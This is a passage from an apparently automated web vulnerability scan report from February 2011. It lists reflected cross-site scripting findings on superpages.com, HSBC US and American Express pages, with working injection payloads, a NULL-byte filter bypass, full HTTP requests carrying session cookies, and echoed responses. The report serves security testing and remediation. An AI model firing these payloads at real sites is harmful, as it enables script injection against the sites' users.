<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
1.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74692
Date: Thu, 03 Feb 2011 17:09:46 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]... //yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
...[SNIP]... var hostServ = 'http://www.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:36 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:36GMT
Content-Length: 59492
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:45 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:46GMT
Content-Length: 58480
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y ...[SNIP]... <h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1> ...[SNIP]...
1.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:06 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:06GMT
Content-Length: 59798
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i ...[SNIP]... <h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1> ...[SNIP]...
1.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:55 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:06:56GMT
Content-Length: 60810
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages"> ...[SNIP]...
The value of the sub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e765"><script>alert(1)</script>4ba170077e5 was submitted in the sub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ac-usap.php?sub=xyp7e765"><script>alert(1)</script>4ba170077e5 HTTP/1.1
Host: www.thehealthreport.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <!-- saved from url=(0034)http://www.channel5healthnews.net/ --> <H ...[SNIP]... <A href="http://ziggymedia.go2cloud.org/aff_c?offer_id=6&aff_id=1001&source=xyp7e765"><script>alert(1)</script>4ba170077e5-dp" target=_blank> ...[SNIP]...
The value of the hp_pref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bf5"%3balert(1)//00c0d1ff9 was submitted in the hp_pref parameter. This input was echoed as 74bf5";alert(1)//00c0d1ff9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r74bf5"%3balert(1)//00c0d1ff9 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:06 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:07 GMT
Vary: User-Agent,Cookie
Content-Length: 5895
Set-Cookie: USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content=" ...[SNIP]... <script language="javascript"> var date = new Date(); date.setTime(date.getTime()+(365*24*60*60*1000)); var expires = "; expires="+date.toGMTString(); document.cookie = "hp_pref"+"="+"r74bf5";alert(1)//00c0d1ff9"+expires+"; path=/";
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 was submitted in the code parameter. This input was echoed as afe63"style="x:expression(alert(1))"19a95eb25d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /1/2/3/hsbcpremier/apply?code=MEP0002714afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:39 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:39 GMT
Vary: User-Agent,Cookie
Set-Cookie: USIB2G=0000Dhol7ilZ0q0aTb173umEJKd:14k1jbteq; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:38 GMT; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 34486
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7758e"%3balert(1)//c523249deae was submitted in the code parameter. This input was echoed as 7758e";alert(1)//c523249deae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM00016997758e"%3balert(1)//c523249deae&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:11 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:11 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000JbZ447P9hCR84of1XRxrbLB:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae3f'%3balert(1)//f4fc58b391e was submitted in the code parameter. This input was echoed as eae3f';alert(1)//f4fc58b391e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699eae3f'%3balert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:12 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000bKlIRzRrrCPXuxZazS0H-Ki:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f was submitted in the code parameter. This input was echoed as 41ec8"style="x:expression(alert(1))"fd17a07d03f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM000169941ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:10 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:10 GMT
Vary: User-Agent,Cookie
Content-Length: 27260
Set-Cookie: USIB2G=0000NYkxlYtKgvFgWjsyZ7uTMLY:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52396"%3balert(1)//a663c189a2b was submitted in the inav parameter. This input was echoed as 52396";alert(1)//a663c189a2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?inav=footer_small_business_credit_cards52396"%3balert(1)//a663c189a2b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:24 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=a;Expires=Thu, 10-Feb-2011 14:15:24 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=footer_small_business_credit_cards52396";alert(1)//a663c189a2b"; </script> ...[SNIP]...
1.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www201.americanexpress.com
Path: /business-credit-cards/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a54"%3balert(1)//fd4c9d0046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a54";alert(1)//fd4c9d0046f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?15a54"%3balert(1)//fd4c9d0046f=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "15a54";alert(1)//fd4c9d0046f=1"; </script> ...[SNIP]...
The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44aa5"%3balert(1)//7dd45ad0d89 was submitted in the view-all-business-cards&inav parameter. This input was echoed as 44aa5";alert(1)//7dd45ad0d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards44aa5"%3balert(1)//7dd45ad0d89 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:11 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:15:11 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71876
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=menu_cards_sbc_viewallcards44aa5";alert(1)//7dd45ad0d89"; </script> ...[SNIP]...
1.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www201.americanexpress.com
Path: /business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7597"><script>alert(1)</script>c7d4c5b0106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7597"><script>alert(1)</script>c7d4c5b0106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?%00d7597"><script>alert(1)</script>c7d4c5b0106=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www201.americanexpress.com
Path: /business-credit-cards/business-credit-cards
Issue detail
